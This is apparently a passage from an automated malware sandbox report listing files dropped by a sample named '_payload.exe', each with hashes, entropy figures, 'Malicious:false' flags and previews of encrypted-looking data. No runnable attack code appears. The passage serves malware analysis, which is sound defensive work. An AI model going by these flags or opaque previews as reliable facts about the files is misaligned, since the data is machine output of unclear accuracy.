                                                                                                Entropy (8bit):7.944449634817851
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:QSJf71m5FWUHZab0CR+aSSxN26e7q5gCr:7Z7A5YUy0sgCr
                                                                                                MD5:A298CB97987358AB336630B1AE841450
                                                                                                SHA1:B52A30126245B62F71D882FB0DFBF022A416F1EA
                                                                                                SHA-256:E5DDCD4F330F311505D55E4EA67E67CDED7A11A089BC47B44A8EC044A885551E
                                                                                                SHA-512:22061AA66022254C565630C0394867EAC4E8D39BA5549157F4290BCE770A27338520F040DA46F23728B3E9286E071422C2EBFAEE931F9168095CC26BEF8B52EB
                                                                                                Malicious:false
                                                                                                Preview:<?xmlm......x.(.J........4...gD.....j......3#7.<.f..s,...\`...H.g.sC...oB.e....E_.N)..H.s......B.H...r.W.....l..>/@.......q@.\.}.{.Q..Yn..>..on.CffE..Y....z...R...R.Gg9.2..q.Zmf=^.../.....<.=.4.?u.....RT.Ag..........#F.D|U.........3&..K%j..S.2..MU..l....&....R.]....Yp.......D.o...........c.....az.H.~pZ..v....T..1}.Z..R.i,../..j9..6d....8..M.V.....k.....1....jZ....5.0..W!..ox.LT.......g..?....,*.j..-A].V...?.T..pu.@w+.;.......5z.j....?:X.........w.{...m"p.V..i\>.A1[...5.t..R. IC..=b.QV.#4.3b....*.O.8....... P.1$.W.>4.R.....p...F^..".....%..R.......B.......y.$......~.....N..^...%...5.IvGHu~.G..+y.k4............RxG..TVp........t.M.~".;S',9..X..u.L. ..Q<D.....>^..+...f3..a.<o.q......i..a..SpO..k.S....{T.z.&.......5..dU?....)...;cm41.ZZ.!s.w.H&s9A.R..PY.....ha.=.&.'q+`..W4@.^....d.$..%O.nO?].Y6J....+A....?L...'...p.a....h.[w-....<.i.vD.~P...}=..$./E....7\..e. ...>..*......xG.......e.d.....<,t..6..c/.(..7y.x.5.%..WZ.5....s.+.l..b.............8.
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):980
                                                                                                Entropy (8bit):7.76037346531245
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:jzOfff8zWJy3g4MAIqoPprdTmpADYXb2wAx3bD:jqcWQ3g1AIqoP6pOY6wsLD
                                                                                                MD5:C1404237EA3A849355571DC09F7025E9
                                                                                                SHA1:F42CD143EA47AFCCE80E4B50E826B482D7AF610D
                                                                                                SHA-256:6DBB4674076DC545654AA98B04980D0B270445F0F2F8AF600B33BDAB7778F8BA
                                                                                                SHA-512:AD8DD83FF2916FAA3A158186113B6187959EE512286EE998B120F46A997360501DA9709DAB9D3BEA35DFEFF8363A92446A25242A2EB4C9FE5735FB45F42F3B67
                                                                                                Malicious:false
                                                                                                Preview:<?xml.;...i..uOV.Mx...v2.Y|....\..m...+..+.C.3....R.5..U..zi.. ....[={..z....p.....c.......*L..}..>Nn.....M.7.'{...y..5....`.:.)..M.bW.. ..?hp..;+.xh....~b.4s....&.~.B.=%..4..P4eC.!....D_.G.=.k.h.......T.Dz4cFt...a.R_...kyk...gxXBwH.2m..!..'j..O.^...6...**M...W%...n*....J.I.g..].|H.......M.....#...t.B$...d......=...;..H1..#%.l..G{...s .m.D...'s[..w...NI.8..h+...C...".=|...g......6.6K>..w._5.-.z<n0.....~.X.T.x..N1..\z..Oh.(.F.w*..+~.....yA!G5_..!.y.g.\?.I-...@nUI..d...CqQ/..D..c#..6...F....@-b..w...}$.E....{..50.K.I......%P.D.!..E...]..N.J......W%<..r.)...X..VZARbV\..[.T6r_B...RA.+....cp....-.:2Z..xh.f.U1.u#.N....B...0.!..8*d.|....,...F..-P.5......*...I.......y..8tTHk..o./..W.n..s.L.0..3..J..%...`w....C7B0P......6.Jf....!+.%..v.....M.pS..Kq.T'y...J..}....SY...!._..ye.8.n..\.Q|(.S..E4|p.:U.)..t./.RFl.D?..F..!}8..3U.4A....h~.eAK...T%V..%C.<.HaBUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):2404
                                                                                                Entropy (8bit):7.915372384329899
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:OvUz6djT8NGh3X/FSLjl6kdjlbKUpHw2EQF32wMvENBftToP3LD:sqNGhgZj5KUpr8nMXF2
                                                                                                MD5:6206024704941FEF62770F482EC05066
                                                                                                SHA1:41A417C17EFE7917579CC3C2FC353025051CBDDF
                                                                                                SHA-256:63A12E03B069F527C128B60A6FCEEEF4E7E03431B3006F1B3A239BE639B4D82C
                                                                                                SHA-512:6E18ED2712CC23424425342D6F9907CF6AFCE0EB4960928F9A994E85DF0B7B56BB8E27D97FE1A7D3CB7B7C417A67075AF44218754EE56D5F6E02EE552901F1B4
                                                                                                Malicious:false
                                                                                                Preview:<?xml..H.$..B/C.H..Wc...w...r._..^C.^.$z.zDPd...q..~J.N;..D.".B..1".....:....n.M.o...W.1v.#a.^r..V.[....V.E.......I..l..9'......@,.8x.D0.98...-B$."U!A...|XA.@..[..3yD.%...0..R<j.0..L.]`csn....W.Ln.,[.s.......5n.....>....5^i........kWY....V..`..m..5..</e{.U~.....w."(./... .bX.).@.....x......3B...B.....sxj.5;r>.....y.0...}{...b-..;i....l.'..y.l..XI.......%sT..$..U.L.w...N{......1...\=.T]..:......'Dx..8..B.bV..'..1<.Z...........Z.^...K.,..XNQ}fm...1..{..O........7Xy.-.0.. ^6t..<.".....n..b9....g>z0........\..u.J'.V.`.H.....T.P.....xg.....1?.$u.3.P...Oz..W..(\.....TCT..,$..LU..}.....6h..Z.........4.r..?.iW&...:XF.... .C_Kn6*E.%g.Fx`J....9...6y..F.4.s!BeF/>...I.7.HA..].3..2d..........u^.p.3{z*...7...j.6.`..Y^F.L....3..4Wi...L........lO.^c..A.,Q....>...".L-9.TG..&$.?Z.A@..|.......G.......-h.:.e......e..fc.&..O...I....3..6.d. <.I..LM.^9z/....A.J.e.Vq.|..mu.....*.%L_.v..=....... ..g.#U.~,P../O".@J..*.S....c..c..1.b.e.........Wj.Y".I.z./....#.<$..o.h(UC.
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):3203
                                                                                                Entropy (8bit):7.93448650968712
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:A1Ovd0zzx6kR4zgfxbSryEwTNu7q0CEwlcJGt:lKzzzR4UbSrd69SGt
                                                                                                MD5:4C4FAAEDB219C1EDFF355852C00C3770
                                                                                                SHA1:E1A391267530B2F9A6D8AB00E633CE3827430EBF
                                                                                                SHA-256:9594887FB6A265A6C3D4B8FB2A0B8B691630C93128EA3D2E628D8B1B86CA2C2A
                                                                                                SHA-512:6CE3B03E69B8B5B3AC0C88DF05A3F551168A400CB292DC23874A4AAA8850202FF5C2237CE23F6BA3317B6C0778E4235222EEEA62156F155A69FA9285C39D7CE9
                                                                                                Malicious:false
                                                                                                Preview:<?xml.l.%<..i2.3....~....'.-..JRf.....'..O...O).P...,yc....\.oJ...?.....;..B.%.u.."..(...%*......^...E...m......'....g..U.;v.N.1.x...U.... ........vu:..eG._"h.....Z@.....2T..%N`..j........y?..H...S........@/`..8..<<.2..nO.v..l...E5."ML.*.`&b...@..vI.."(.k..K...n./.@........U.a...?....u..>...SiF...i<.\. .....u]>.5...Q....g.5.......T[.....:...........g.<..e..A.\.A..X.K..p...U..|6u.j..mJl...._.=T#.......4...E.. ....%......O...@......kf....-......'Fm..F..v.....K.Pn......g2?z.`>..!.J..s...k....}......'.g..w....{.s.N.!,.o..).M......U,...7*L..A_.E3x4N...=..F.3..f. A.K^.`..........b.\;..y.$._........#.......0...cD.,.....6H..).h.k.a....N.........b..G...!.....y.KM..c...Qr..i..H..^Z.)..W........}.".H.............r_;.0....N.hk............viI...=...u.G.?..............N9....2..M.....K...*...d..z..m......s2.N6..8....2...H.8.).?.U..~9...}......6...aJ.QR.k9PN..9..A.2......}9p..(b...S.#.......,$a0....m..x......8.....P.....S...e>..q....
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):2512
                                                                                                Entropy (8bit):7.923196913469114
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:pT/aNJBLniMkNgJFoQbOA6nF5zAHZ7V3Sq5QhqkDCn5XdUxsce8LD:xeBLnhygL3Z6nyZRj5ODcY
                                                                                                MD5:E3C92220F1DC6598CC6FE66E7F0083A5
                                                                                                SHA1:A0D03A4BB2D07B1441DA08937792BDB19BE61FF9
                                                                                                SHA-256:98E1E0A389BD2BAB51164A737B3C101BF83A8A7F3B320900DCCB6B53D3F06A3D
                                                                                                SHA-512:669DB8F02B0924986C8AA4E665752FA58B0BDEC6F0C3EB4D9311B5B90B48EDF4EFF318C0DE862E54CB884A4869A5DAB458C22638F4EB8E39A8A1AA585FB70530
                                                                                                Malicious:false
                                                                                                Preview:<?xml.W.2<X!.9....<....8(...'.....^J..x~.+]...|....et...7}.....^....z`t.@z..T.;....f..vL.... ......N..a1...4.].w...>c............n../._.e5........}L_E0L..NB...,...3.yUt.eR....=.....Hg..\oc=..........25].R.<..I?..{....r.6...i.U........!*....vyM..&L..e.8r..a.1.T...m.u>..Y4. ."..]FCQ!.......Ehnz.|./....R>...t..run.g.Ga.].8..;....r7...MJ;R.2......GU.<PH.....=..oyI..yw,.).....$..u.....:.h...n$..e]..y..=..5.Y2IT../6...0......_..t3Ey...-.......b..C....`..1.."\......a.5w.....u%^..}<.aP. ..=.xN.?.J......~*....c.`./G!<....X..UvQ.;.!DBe.p.x...@B.0...!M..3.+zs.9!.d.p..$4....!.oEWp.9..X_.g.[..".m..6.O.%.....\.{...-....\x....B7.>b.6..AP9s..Y.~.R....{..k.M....2..W......S..N>..d._M&.H.^|xx.dU"w...a.Vn.....D.CL`JEV.5j.Ezm!.......p>..G:...2.2/OQ.....c...3...O..u).>.nO...v.:.....~....'[..Lruu7?..rq.W.......4...X.0..Y...}...i_..s...=r...~..[.. .s.RD...../H..X.)^vv..../..U.....'~...3.......V.&..1.._..K..t...b .Z.u.=.+.S.-.%.1..Br...j...%Pep....rp......+
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1247
                                                                                                Entropy (8bit):7.792094209842105
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:WN5n6sXsPN+GwXmHzQTiVOOxQ7kEqnNFASExbtJOnKNn1FftW+dbSx3bD:TdPN+/2kTiJpNR+JC6FVRdiLD
                                                                                                MD5:9FA32D7359F30F3BA3E05F2B853C1422
                                                                                                SHA1:CB5295B4005ED60EDCACF971CE2D1777574F7374
                                                                                                SHA-256:DA614A5EB1C040B913459E61FD9C9DFBB1A4ED7E66FBF6556B17E50D1640F119
                                                                                                SHA-512:0F846CAA66D50DBCC6FDBCC02FC7A866CF6FA3405D8016960C7824F01254F973888DC2D7055EA0E180777139FDFDEA36E3D632E723BA099530103679FAE7B8B1
                                                                                                Malicious:false
                                                                                                Preview:<?xml^..5..-..s%g.0.=..O...O.;Z...@LO...c'..{..Q{.c.!..^....<..~.A.7q...?Wt/....%.....O.p..mH.'R.Gc.K..T..."\.f.8.KO.o....s>-..J*X;.....F)........\a..v...G...C....l~u..j.q?...=#..)..}\.#.>I.7......Y..l.t.....{..a...d;....*5.}...E.!u".2.z.O..........z#.;Q\.......q.N..5S....U}.'.V.#)....#.).$...*....W7;..3....u..I?..b j..........=.P.qM.y.q.<^..../....l[........[4.f..]8.].Y.......H9.N...6\p."]I..H...9........].....~..mw.sP!..^.v..!...z....N.....{8.[......J.G.C..x.ltM..2.WM.F..~....+.8.nN#"*..s7.r...d(l..X.....6L.EqA.yKd....OJ.?..O)..K.D.e...9P..f..EFR.^..L/.".P....+.ER../.....MF......t..C...0?.|,&.\.....({A.......t.G...t..F-g...U.....Z...(AV.c....w0.5..Q.^.g....c..&L1;....n.O.t.2d..!J..$.[ ...*XJ.'.`02....dk[.t"..U.....o)K.L.xl.i,.M.=.....M.....EIC.g..[..."ji..D8..31...e^.'..@(.....89.........1......E..<q.S.L..V[.5.GJ....*..vr...yA.'...H7..:.#.>...RH.i'..5..!.)uF.2...PU........XGL.(......=..O...J^."ff..4}.~..s)..W....=.Yu..H.D.UG..~
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):950
                                                                                                Entropy (8bit):7.736032495157646
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:2Rj/SR6L2C6cI2lv+O4oXhWnOaitN7CX+VtpqzMWp9HczjAoy0+jL1Gw80pFdggS:2RDBlDnnXhWnhmo8fMX8HfLM168Ax3bD
                                                                                                MD5:4D8F8F8654513525987810D49CAB1054
                                                                                                SHA1:85AF3C8C97BDE59D9CFDDC4AC9218F11583EF9E4
                                                                                                SHA-256:8860B4015C0E49B5AD4DB2C45F205882E1566BEFBB40D3D0DCD28C9302A9EA1C
                                                                                                SHA-512:2F6962A8A5577D57A8BDCA92547E35522F276A8E34D659F02B217DBA3C6E6A0C188968CE211661C294F5CB2EBD9D2B5989F17132B4F792DE1E830E01FE87B36D
                                                                                                Malicious:false
                                                                                                Preview:<?xml..cUzC..6.NaW.k.t.-3.+I.?...s..^.2.;..5.O.0..).a.NA.ZhS..~E"..'n2.F.g.O....l9...,.]$k........x...,x.l.qje...z...@.Z.._.A..{...(....t.M.'..@S...j6.A..Mq<...r}t...+..6).%.V....<]X...i.qc..V.......$<Z...t....4.E.;^ygs..A.kv...E.n.C;...d=.o......../........?...}..[.;s.B...\.[......a.....q...R.G..CV......P,..."bo.z.J.p..z..7.-.,.j...1..#..<R..Mq.Qz]....p.=..0..1. ......7..u7z.^.V.+6P...;.8.B.1.+i._....l~..w.0...O....M..P...g......|^...N...;x..*.....O}Et.....j.m.t........v3h.....n..HBC..6..*bs.5.eq..\.`].D.@Ub`v=......`].e.D...p.O.{.1.a}......p.s.h1......BI&...4.?...P\|....{8p..yD...6..N.yz...(.MmY..u..j0.+...c.....C..(...o,...;.E.`.D./.......4J..N....,{..<-...*ue.5.t..H.G.P..<.z`H.2.....ox..R..@.h:=.....p....f.....U..[.H|3..b.[.#U...G.%...w.HU=...tQ.Hf.....3...3.e.O3q....\.[-c...O.....\XS!..SS.....LD...'.BUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1125
                                                                                                Entropy (8bit):7.785563710147411
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:4184F5z/IwrXSTOp2quFV2JJ4U18Zzhk5HafZJidiEG7x3bD:41p/z/IwrXSTOp2ZEJJD8hFfDAnGlLD
                                                                                                MD5:E480EC90B4741E6F876B6DC43BC1B05D
                                                                                                SHA1:E3FD115225D884CA8A812AFC30EA827E36E1B31E
                                                                                                SHA-256:74DFEEB321DF86515D7CDA4E251943CDC854CE58469CE36F08B25965D0E2A0D7
                                                                                                SHA-512:06963EA5B2B933228054265B7FB10F5CC70C1CD28C62146ADF8DBBAE1A30E1AA152130CAD94DEB60B6C86D79FEF7389B4141EEBA9DE419D5ABF79B6B3A7469A5
                                                                                                Malicious:false
                                                                                                Preview:<?xml.d!Ej.|.P1..wo,.....r.....(.^...Qi#....}.~..'[!rx..7.,p...v.....up.-.J..,.....Y@0.9.U....zF=....:..... ..Ww.}....hUGUM.s....G.-u{......&g ...(O..fU..#.....C...M.....>JpmU.<.....J...I.5.5....6..q.P&.F..M[R..x....S...~.....J.A].C...][..z.B...........t.....'=T.....1:..R<.`...,.a=U.......].-.....a..9.M..1CsL....fe.N....^...,.H.x...1)K.+d"oa~i1..n[P1....b.....fMO....K:.f..n....E.N.b..4.E....a,9I.7....w....1.9....O.a{=..b..7..X.y......t]gy.=..,...*.l..}.J..M..... \.]..2....-...yD.9*....b.%?...nt..\..x..5.<..z"l.q>.x.H.V....$o5i...O......._E.1.!..M:..%=:T.=...e..L..BR+/.8.lh.v"@....,.?.%.}.VO..v..=.....s.?.rZ>..|-%.w..;.m....-.......}.%&.eAB...k.`.8A...0...G.s..ju......k.;.h5.]..N9.....*....ir.$.a.`&O@.%.V...E../?.C..n.!...""IpB.r.2....\......h..M.d<%x."...#SA.D[...1+E.|....i.rio#@...<.$.C.Rob.i5=...Q......"w.[..y.d....o....5... ..`".e.?E.hV.L..m.".....$\B..Aw...:...._onZ.o.[f2..L.K..@.m..v...%.. ....2P..$.>i.]....)....M.k.$]....m.8
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1121
                                                                                                Entropy (8bit):7.79368723876537
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:YMJHtDz3o9P+cKvshOarnpOpoyZI9EkWtbBYc/muDUIUl1YzFkdOSx3bD:YqhgP+OTrpz7EkAlYc/m5ROFkdfLD
                                                                                                MD5:0F1237FF23B335D75A86C4B0788B2FE9
                                                                                                SHA1:263E644926E0F53C3E3235564F8136CA8BF56014
                                                                                                SHA-256:C9EF784987BADC0BF4312C36DBB41B3B81729883EDD17407CAB41EBA7EF3A9BD
                                                                                                SHA-512:9766E0148C5700AAEB06C442C4003320508F2A35620202D66E2EDE8E4A82592A4E17CB7E3617A1C1A15CEA0EA9E49912F9BB55D92EDFDA5224A3CED6563F7135
                                                                                                Malicious:false
                                                                                                Preview:<?xml..E..u....K......~.{..^.Z.(...[.$.s...n#..t..gB0gg\.......F.~..S...2.%....S.l...QuS.jp3..."...ky...s.r....t........@n..2.ST>]n.3BuFr...^..#&<..PL..\....../.d....*...~.|{%....c...5..... .Sf........4..{..........6YP..D*\..'^.l....'p.+.j/...S8.".9....{...}. ..=...dDK.B......g\..O`.k7........h.....@YK..[0Z|...}...N..@.{....N..r.T....EH....+{..,W.U.!..9...nA.f*.n<.n.<!...;.B|S......S.".o.b..K.m.?....7.}..3.fA....../..R../........V.....i...*3.o-.|......d....W.Ix...dH..c.\......Z.........-..B..)/...7.J..V.Y.:ug...T.}.m.;.e0.........8..Z..]Ucpw.B..).......`...".>.k=....._.]...>..'.u...F....Ou..PN...D..\.pM...BIT...?..%...:..U.a.y.I.8....Y.OQ.....O.... 1@.<.f1..x.*}.......-..k..].h........rl\.......5.QEl...G+X%.sf..!1.."c&.%.9...K;:.X..t..#q.O.@Qwgi...:.........x.'%..q.\A\L4k....19.%..t]..<...Tw/..s...d.'.Y....9......j..7.....E4^'.t......c.'.._0+a.....lIE..x.t\.W...v....d.J............_M..2..Y..B......-=..TT..u...GCs.n.B.w.<jR
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):3109
                                                                                                Entropy (8bit):7.930408248505253
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:uIQU3bO5aUcd6cAJTg+CiNcdjRb/BYD/tYGtXo/ctiCsz6ZAM0GzNQz6FTHkPBBN:uIQu6y3CbwpcJWcACS6ZAMZNY6NHkLZj
                                                                                                MD5:F6BFB1DE72C5134D107271B8A670BBF3
                                                                                                SHA1:AF41D522F6564447E46EEE9E6E015CE56D3BFBDA
                                                                                                SHA-256:DF67CC4C177BE7A4C6624713092D8013193529CA8B51784A18F7B514E715B31C
                                                                                                SHA-512:6949AD017E2BA55600EB7D0987B0A81CFA54377A193F41D41093E78D38FB01E4CAAA90E4A64F6AEFF2CAFBEA307D05D6A5FB01823321530F15B3F26880D054FE
                                                                                                Malicious:false
                                                                                                Preview:<?xml_(R>$..........H..sk.i....rA.."..2.......Q(.C<..4'...#A3.xP.......r./.P[.LnL...E...p%./=..U|..Q.....U.G....s..K%`.&...Z.~.2......%.~v+..4..j....9.k...Qw...]9.....N7...`....9..:v..4..O.9.^.....\.....8........./g..:.....T..'.0.nS\.&.L..g.8...)w_..<..0....L;......Z;.v....4a.D..X..C}...)r.od..7>.|a..6Z..D.J(!.1........F/....*....bh.....x...r.~R..M.F."..).?.3......@y.S\...v.....5...c....@r.....{..Z.........@>.....'.0]....Hh....O...a."..xL....P.X.h.1...M..3.kU.R(.....r).l.sc3..v,ZV.H...t.kE.L.)p9.,..(;..5.1....,..D....b^...%.;[........M..k.c..Jt.".u..<.B....Pe...O......0.M.=...."-.?..S....Y.e......:....]....Q.....S.H...T.]C.`..x..50.Tz..S...~.g.V......J.\}./.j?.KY..T.....R....X.U.]$U.<.'e..=.0#.....]A.k....ysa..R.T8..u..9.xj0..........M..G..X...O...$..0.t.6].;.3.w.R.-..'..&...MJ.....$~........._.a$.z...........x.....}.".)....-../.l.9.....a_...I..`HD.....a..-.}D.e...PVH.M../.....JO...pV...g0^..s)Y..._...I.5.G..0.pY#.%..2...0m..
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):2126
                                                                                                Entropy (8bit):7.912407988834968
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:QGf+yeFO4pt/aKuHP3bLCabbBPOFwnamrQX6oeKUPULD:QG5eFTpBatHPLLCanBtMKzA
                                                                                                MD5:7E26C3593115C5A89E8DFDF5AD88614B
                                                                                                SHA1:026EFC1B391D0AC57003EB149528D6C62022E8A2
                                                                                                SHA-256:CC981C35FF9044E206253FCECE56FC8AA1814508FCB920CC9DAFA1A65C214F3D
                                                                                                SHA-512:75FEB2F4DA66BD6E4AFBF1DD3BEA7F100AAF0503471CED854296CDA9F610F6EE43B0967162157A031B19AC10A86385D5A1E31D657206579F4ED24AFCB67ABE7F
                                                                                                Malicious:false
                                                                                                Preview:<?xml.x.........j.....,...M..yK`....~%/t.h@.P7.G..I......c.x2 .@.:..p.%9.k.....C.....p.....].V.C8...k.......%x.=...u}G..>N2Ul.re'.,..u$...A8.X...'.wr\..~..t.$..a...x.......>..[(...G....`...WH.J./K+M.&..".;/..k.......8...Dz.q.....z..V.,..........[?.M..k......u.?..7Yz.E.V.".C.c........f7....06.`.y......&.R../{..W.....^..O..9$.8.o......T.4...~,..N0[..>...%....:...s`..W.......f......y1.*.zBC.T)ckD<k...z.e..&.D.p*.*.nH.i..5.C.o...j....m.....y\U........8.-...X...l.9+#.V...t..|...w...7.....QP.R..Y.+..+..gKo...6K..Og.a..!...4..e..\)..~Vl..n.B..H..U^+..Hlm....X....:\.{0.b.e.9..'c%.9.[Ab.X.......\N.W...n..<.'....p>7...!a.yw.(J{<....oY{]...6.X..:..F.? ,C...mK....q.o.w......8...s$.}#...!x....M.....W..........fn.......y.b.+,.....R_.F2..6'...7..`:..P..z..C.0*....,...,A6...dat_...x*|.;H.3.:..3Dt...:....N.E..L../...&|.5...,.}C..{zYs..6e.7..}.s..*..5j#...EW.\X.<C4..C../....,.y........U.~Pi].T.......Hf....V...6}J.......K.5...c&m..
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1387
                                                                                                Entropy (8bit):7.84823569444965
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:AZNa7qP0cQdN4jurRv8b+u4PFhFzMeHRP0lg9jdvzJLzJ579LlTJ9WBKLV0Yx3bD:Awa0PZlv64PVUgnvJJLf+4LD
                                                                                                MD5:2148FE77C0E7E9D4843812DC74CCC9B8
                                                                                                SHA1:A1F0015C997062C7A414C64849A9DDBE847D3423
                                                                                                SHA-256:D7D3B30029ACBAD2156FAC1813009F3EFFD0346AA0280CFA4CCF4E6812004473
                                                                                                SHA-512:E0BF45A59037B104E339CFF0236FD83DD97BDBF847D4071C7142AAA4BC9329417C9297DD18ADEFE32E80778AC2DCEC9084003E94F45B52DB748809E3150D05B2
                                                                                                Malicious:false
                                                                                                Preview:<?xml!#.....cR.aG....^.~3...Q-N/...B..M.D.ro!...>..6..B..,p.9..Rg.vl..9'..5.....]..^.@cP...K.@.d.........>..=.6sA"..E..b.".V..n.6.X....2.....G..Es&..e..U~X...9...Z.l.~5.N`...DkrR..N...F4g.O. L....|.~]~.4LT.O|.a?.y.B8.Q/.......:....S.}.....g...F}-.9.[k.[........e.....-"..N`...,T..5.......^>..<.W..0**....gq..R..:.......[...X./....0..95.ZP.....Z....h.=8...E.HI.].4 .3.a.8.'.(.<..4..0j.v$;<...S...1....JS..e.:]....=).N..d..n.Mn.&..ga%]..z.....V....1.....3.8b.pE.......u.%}.W@..>..(8w)..%"T..V.......B:...m..T..cC.RT...>W.J.a...0.XT.`.pu.k.p.I^)]a.T..*g..C..;.2/R..PYS.V'.......dk....A26C.:c[.7..B..`.Q........` ......-.,..........A..m.|.{~w.x..4...:O...w(.iP..Wt[...av)&#G..Pj.l...a.......;....nlY?.?.........S...b.v/.2.<..R...8+G.r.M.N.......-..:......fv?.....<.^B,...[...z>.Q@\q.x*y....A..^.[7....;BA...p.hX...R.!..)._4.n...(#..m.Y...)<.r.T..$J.3..n....ZE......rS........w...\^.*.!.|.M..?G...._...iz.&a......Y3h..F3....D.e...u....$...N.@.61?.!....T^r...n".kY.H'}.M..}b.
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):754
                                                                                                Entropy (8bit):7.634026634049504
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:BPQCWHnx2N367wNr92hLrNNTEqfnwZV4qvyw76GAQLybdStEm7U7DLQASpnSgJcn:BPTAnYohXHrfOSqv36l+oDLQtSx3bD
                                                                                                MD5:DF1BF9BCB70C8831979C531101F881C2
                                                                                                SHA1:3B3D100E6D38B4B60E1BAF7C0FECE6D2FB8CE657
                                                                                                SHA-256:E439D4950025BC9EB1B367697A2C94B32F7948043308D762C84E4ED61C1CD124
                                                                                                SHA-512:2DB3602BB008EB23E8C1D1C923623594FA349FA284626BEBD0B6E7E0D7E06337DBCB9958A93F1728791F9AF71207E7B12E39C21D3F27C7F7A9DA6280F01DAA81
                                                                                                Malicious:false
                                                                                                Preview:<?xml.}>k......o6..7.......%j...@..L.d5$<.S..r.l).q.z4.Fa.V.7.Z._.T.P...#.."..(.......S..2R.......W.D\...\....U.h...k..|..z.......Y..IL-B.]?>j.B#.f.-........I9.E.Q.x.*.+....7.ZC....qu.u)...K...C.EI.....@....U..o..R.....$.z.\.|-!.y..y....<0..y.8.N...K,.o;.5$...e..CIy.o.nF.....i..."N&....{>vI..?]..y.Z7.U.os.l.j?.W.3...../.........d..7.:.f.dN.u,.Z.`;..H.k......8.c..._.:....+.!........U..d?. .'..DnWC_=...JcN......z.Gu..[G..A..T.T.....0I`:c 2..;{...|U...f.n...$w.CR.%...Q....3....s.=:...F............WdE...T.H....j_...U....3J.yF.x.^"...7N.M.z....y..&.v.d.O...+.LO.o3x.;...z...>"..'......m.-.bO....>.>...L%n.u.ku..1Y...K%..cM]...1M.FJ.....!C.BUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1399
                                                                                                Entropy (8bit):7.841729575707428
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:5r8c4Sdy8SYL/PkqD+z7urY1AE2nTnAzqfab/2nVewOPERhf70Kitl1vKLgnrxRE:528JDM7uruABnTncqibIV6PETf1edDrw
                                                                                                MD5:110D07E04D201E0057854050E0281332
                                                                                                SHA1:7BE8F206D95BF9E5DD45A5E7BC6A106D5979976F
                                                                                                SHA-256:2EFDC8740FBFB4CA793F4871076BB265FA12302CA9F896E14E69B55E758C3728
                                                                                                SHA-512:38CDEEF7FBC4A8AA8B0784C518AA50523DC4BD90C576ABCF5056B29E473154628486B3378793D43624DF961CE5FBE1CA97DAD6CAB92FAFFBBED3F648B9E3853C
                                                                                                Malicious:false
